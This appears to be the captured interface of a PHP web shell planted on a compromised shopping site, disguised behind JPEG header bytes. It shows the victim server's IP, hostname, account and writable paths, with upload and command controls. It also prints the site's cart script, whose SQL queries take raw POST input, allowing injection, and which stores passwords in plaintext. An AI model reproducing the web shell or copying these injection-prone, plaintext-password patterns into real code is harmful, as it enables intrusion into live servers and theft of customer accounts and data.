���� JFIF    fdasasfas213sdaf403WebShell
403Webshell
Server IP : 147.79.69.42  /  Your IP : 216.73.216.200
Web Server : LiteSpeed
System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64
User : u479334040 ( 479334040)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u479334040/domains/saumasale.in/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/u479334040/domains/saumasale.in/public_html/command.php
<?php 
	date_default_timezone_set('Asia/Kolkata');
	header('Content-type:application/json;charset=utf-8');
	header("Access-Control-Allow-Origin: *");
	if(isset($_POST['command'])){
	include_once('includes/db.php');
	session_start();	
	$ob = new database();
}

if($_POST['command'] == "addToCart"){
	// foreach($_POST as $k=>$v){
	// 	echo $k." = ".$v."\n";
	// }
	$pro = $_POST['pro'];
	$size = $_POST['size'];
	$user = $_POST['user'];
	$_SESSION['user'] = $user;
	$qty = 1;
	
	if($size == null){
	$ob->query("SELECT * FROM size WHERE p_id='$pro' LIMIT 1");
		foreach ($ob->rows() as $data1) {
			$size = $data1['id'];
		}
	}
	
	$ob->query("SELECT * FROM cart WHERE product='$pro' AND size='$size' AND user='$user'");
	if($ob->affected_rows() >= 1){
		foreach($ob->rows() as $cart){
			$newQty = $cart['qty']+1;
			$ob->query("UPDATE cart SET qty='$newQty' WHERE product='$pro' AND size='$size' AND user='$user'");
			if($ob->affected_rows() >= 1){
				echo json_encode(array("status" => true));
			}
		}
	}else{
		$ob->query("INSERT INTO cart SET product='$pro', size='$size', user='$user', qty=1");
		if($ob->affected_rows() >= 1){
			echo json_encode(array("status" => true));
		}
	}
}

if($_POST['command'] == "getCart"){
	$user = $_POST['user'];
	$html = '';	
		$ob->query("SELECT * FROM cart WHERE user='$user'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $cart) {
				$id = $cart['id'];
				$product_id = $cart['product'];
				$size_id = $cart['size'];
				$qty = $cart['qty'];
				$user = $cart['user'];
				$final_price = "";
				$myPrice = 0;
		$html .= '<div class="product-item wish-item"><div class="product-detail">';
					$pro_img = "";
					$ob->query("SELECT * FROM product WHERE id='$product_id'");
					if($ob->affected_rows() >= 1){
					foreach($ob->rows() as $data2){
						$pro_img = $data2['image'];
						}
					}
		$html .= '<div class="product-thumb"><img src="admin/'.$pro_img.'"></div><div class="item-wrapper"><span class="product-name">';
						$ob->query("SELECT * FROM product WHERE id='$product_id'");
						if($ob->affected_rows() >= 1){
						foreach($ob->rows() as $data1){
							$html .= $data1['title'];
							$myPrice = $data1['price'];
							}
						}
		$html .= '</span><div class="item-wrapper"><span class="product-variation"><span class="size">';
						$ob->query("SELECT * FROM size WHERE id='$size_id'");
						if($ob->affected_rows() >= 1){
						foreach($ob->rows() as $data3){
							$html .= $data3['size'];
							$size_price = $data3['price'];
							$myPrice = $myPrice+$size_price;
							$final_price = $myPrice*$qty;
						}
					}
		$html .= '</span></span></div><div class="item-wrapper"><span class="product-price"> '.$myPrice. ' </span> <span class="product-qnty"> x '.$qty.'</span><strong > '.$final_price. '</strong></div>';
		$html .= '</div></div></div>';
				}
			}
		echo json_encode(array("status" => true, "data" => $html));
}

if($_POST['command'] == "getCartPage"){
	foreach($_POST as $k=>$v){
		echo $k." = ".$v."\n";
	}
	$user = $_POST['user'];
	$ob->query("SELECT * FROM cart WHERE user='$user'");
	if ($ob->affected_rows() >= 1) {
		foreach ($ob->rows() as $cart) {
			$id = $cart['id'];
			$product_id = $cart['product'];
			$color_id = $cart['color'];
			$size_id = $cart['size'];
			$qty = $cart['qty'];
			$user = $cart['user'];
			$final_price = "";
			$myPrice = 0;

			$ob->query("SELECT * FROM v_color WHERE id='$color_id'");
				if($ob->affected_rows() >= 1){
				foreach($ob->rows() as $data2){
					$pro_img = $data2['image'];
					$color_price = $data2['price'];
					$myPrice = $myPrice+$color_price;
					}
				}
			?>
			
			<tr>
				<td class="sop-cart an-shop-cart">
					<a href="#"><img class="primary-image" alt="" src="admin/<?php echo $pro_img; ?>"></a>
					<a href="#">
						<?php 
							$ob->query("SELECT * FROM product where id='$product_id'");
							if($ob->affected_rows() >= 1){
							foreach($ob->rows() as $data1){
								echo $data1['title'];
								$product_price = $data1['price'];
								$myPrice = $myPrice+$product_price;
								}
							}

							$ob->query("SELECT * FROM size where id='$size_id'");
								if($ob->affected_rows() >= 1){
								foreach($ob->rows() as $data3){
								$size_price = $data3['price'];
								$myPrice = $myPrice+$size_price;

								}
							}
						?>
					</a>
				</td>
				<td class="sop-cart an-sh">
					<div class="quantity ray">
						<input class="input-text qty text" type="number" title="Qty" value="<?php echo $qty; ?>" min="0" step="1">
					</div>
					<a class="remove" href="#">
							<span>x</span>
					</a>
				</td>
				<td class="sop-cart">
					<div class="tb-product-price font-noraure-3">
							<span class="amount"><?php echo $myPrice; ?></span>
					</div>
				</td>
				<td class="cen">
					<span class="amount">$<?php echo $myPrice; ?></span>
				</td>
			</tr>

		<?php
		}
	}
}
if($_POST['command'] == "updateCart"){
	$id = $_POST['id'];
	$qty = $_POST['qty'];
	if($qty > 0){
		$ob->query("UPDATE cart SET qty='$qty' WHERE id='$id'");
		if($ob->affected_rows() >= 1){
			echo json_encode(array("status" => true));
		}else{
			echo json_encode(array("status" => false, "message" => "Something went wrong."));
		}
	}else{
		$ob->query("DELETE FROM cart WHERE id='$id'");
		if($ob->affected_rows() >= 1){
			echo json_encode(array("status" => true));
		}else{
			echo json_encode(array("status" => false, "message" => "Something went wrong."));
		}
	}
}
if($_POST['command'] == "newAccount"){
	$user = $_POST['user'];
	$name = $_POST['name'];
	$email = $_POST['email'];
	$mobile = $_POST['mobile'];
	$password = $_POST['password'];
	$address = $_POST['address'];
	$pincode = $_POST['pincode'];
	$ob->query("SELECT * FROM user_detail WHERE email='$email' OR mobile='$mobile'");
	if($ob->affected_rows() >= 1){
		echo json_encode(array("status" => false, "message" => "User already exist."));
	}else{
		$ob->query("INSERT INTO user_detail SET name='$name', email='$email', mobile='$mobile', password='$password', address='$address', pincode='$pincode', status='1'");
		if($ob->affected_rows() >= 1){
			$user_id = $ob->inserted();
			$ob->query("SELECT * FROM user_detail WHERE id='$user_id'");
			if($ob->affected_rows() >= 1){
				foreach($ob->rows() as $user_detail){
					$_SESSION['logged_user'] = $user_detail;
					$_SESSION['logged_in_id'] = $user_detail['id'];
					$_SESSION['name'] = $user_detail['name'];
				}
			}
			echo json_encode(array("status" => true));
			$ob->query("UPDATE cart SET user_id='$user_id' WHERE user='$user'");
		}
	}
}
if($_POST['command'] == "do_user_login"){
	// foreach($_POST as $k=>$v){
	// 	echo $k." ".$v."\n";
	// }
	$email = $_POST['email'];
	$pass = $_POST['password'];
	$user = $_POST['user'];
	$q = "SELECT * FROM `user_detail` WHERE (`email`='$email' OR `mobile`='$email') AND `password`='$pass'";
	// echo $q;
	$ob->query($q);
	if($ob->affected_rows() >= 1){
		foreach($ob->rows() as $data){
			$_SESSION["name"] = $data['name'];
			$_SESSION['logged_in_id'] = $data['id'];
			$_SESSION['logged_user'] = $data;
			echo json_encode(array("status" => true));
			$ob->query("UPDATE cart SET user_id='$data[id]' WHERE user='$user'");
		}
	}else{
		echo json_encode(array("status" => false));
	}
}


?>

Youez - 2016 - github.com/yon3zu
LinuXploit